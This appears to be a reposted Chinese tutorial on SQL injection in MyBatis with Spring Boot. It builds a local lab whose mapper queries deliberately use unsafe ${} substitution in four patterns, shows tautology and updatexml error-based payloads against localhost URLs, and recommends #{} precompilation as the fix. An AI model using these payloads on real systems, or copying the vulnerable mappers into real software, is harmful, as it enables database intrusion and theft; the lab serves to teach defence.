[Java安全]—Mybatis注入

Posted Sentiment.

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了[Java安全]—Mybatis注入相关的知识,希望对你有一定的参考价值。

文章目录

前言

Mybatis注入留在了Spring后,因为感觉用Spring搭建web端后再进行注入比较贴合实际一些。

测试环境

mysql:5.7

Springboot:2.1

mybatis:3.5

数据库

创建了一个测试用的数据库Mybatis

CREATE DATABASE /*!32312 IF NOT EXISTS*/`mybatis` /*!40100 DEFAULT CHARACTER SET utf8 */;

USE `mybatis`;

-- ----------------------------
-- Table structure for users
-- ----------------------------
DROP TABLE IF EXISTS `users`;
CREATE TABLE `users`  (
  `uid` int(10) NOT NULL AUTO_INCREMENT,
  `uname` varchar(10) CHARACTER SET utf8 COLLATE utf8_unicode_ci NULL DEFAULT NULL,
  `uage` int(10) NULL DEFAULT NULL,
  PRIMARY KEY (`uid`) USING BTREE
) ENGINE = MyISAM AUTO_INCREMENT = 4 CHARACTER SET = utf8 COLLATE = utf8_unicode_ci ROW_FORMAT = Dynamic;

-- ----------------------------
-- Records of users
-- ----------------------------
INSERT INTO `users` VALUES (1, 'Sentiment', 20);
INSERT INTO `users` VALUES (2, 'Shelter', 20);
INSERT INTO `users` VALUES (3, 'Tana', 18);

SQL注入的四种方式

这里用的Springboot环境,配置文件较多,先放出关键文件,最终项目放在后边

#和$

接口

List<User> selectOne(@Param("uname") String uname);

配置

<select id="selectOne" resultType="user">
    select * from users where uname = '$uname'
</select>

测试

@GetMapping("/inject/1")
@ResponseBody
public List<User> selectOne(@RequestParam("uname") String uname) 
    return userService.selectOne(uname);

执行语句是select * from users where uname = '$uname',所以这里就可以直接联想到单引号闭合即可,所以用万能密码1’ or ‘1’='1进行测试

http://127.0.0.1:8080/inject/1?uname=1' or '1'='1

发现成功注入,但是如果将$换成#后则会报错无法执行,原因在于:#相当于是进行了预编译的方式,所以就有效的避免了sql注入问题

模糊查询

这里在前篇提到过模糊查询的三种方式

select * from t_user where username like '%$mohu%'
select * from t_user where username like "%"#mohu"%"
select * from t_user where username like concat('%',#mohu,'%')

可以看到第二条中,"%"#mohu"%"预编译前后的%是独立出来的,而写成'%#mohu%'这种形式,预编译时就会将%当做字符来处理从而报错,此时若经验不足将#改成了$即:'%$mohu%',就会导致SQL注入问题

接口

String selectTwo(@Param("uname") String uname);

配置

<select id="selectTwo" resultType="user">
    select * from users where uname like '%$uname%'
</select>

测试

这里由于换了查询方式就无法在使用万能密码获取数据,所以这里将返回类型改为了String,这样就可以通过报错信息来获取我们注入的内容

@GetMapping("/inject/2")
@ResponseBody
public String selectTwo(@RequestParam("uname") String uname) 
    try 
        return userService.selectTwo(uname);
    catch (Throwable e)
        return e.toString();
    

http://127.0.0.1:8080/inject/2?uname=1' or updatexml(1,concat(0x7e,(select database()),0x7e),1)--+


In查询

当查询语句有in是,只需要将in后的内容进行闭合即可绕过

配置

<select id="selectThree" resultType="user">
    select * from users where uid in ($uid)
</select>

其他内容都跟模糊查询一样就不贴了

http://127.0.0.1:8080/inject/3?uid=1)  or updatexml(1,concat(0x7e,(select database()),0x7e),1)--+

order by注入

和in查询原理基本相同

<select id="selectFour" resultType="user">
    select * from users order by $uid
</select>
http://127.0.0.1:8080/inject/4?uid=1 and(updatexml(1,concat(0x7e,(select database())),0));

综上情况来看,要避免mybatis的注入问题,其实最好的方式就是使用预编译方式

项目文件

链接:https://pan.baidu.com/s/1B3Ui-KeGL001JVgFjs9l5g?pwd=1axd 
提取码:1axd

java -jar mybatis.jar 运行即可

以上是关于[Java安全]—Mybatis注入的主要内容,如果未能解决你的问题,请参考以下文章

java-mybaits-010-mybatis-spring-使用 SqlSession注入映射器

Mybatis框架下易产生SQL注入漏洞的场景和修复方法

Java面试之MyBatis

Java面试之MyBatis

MyBatis怎么防止SQL注入

mybatis中#{}与${}的差别(如何防止sql注入)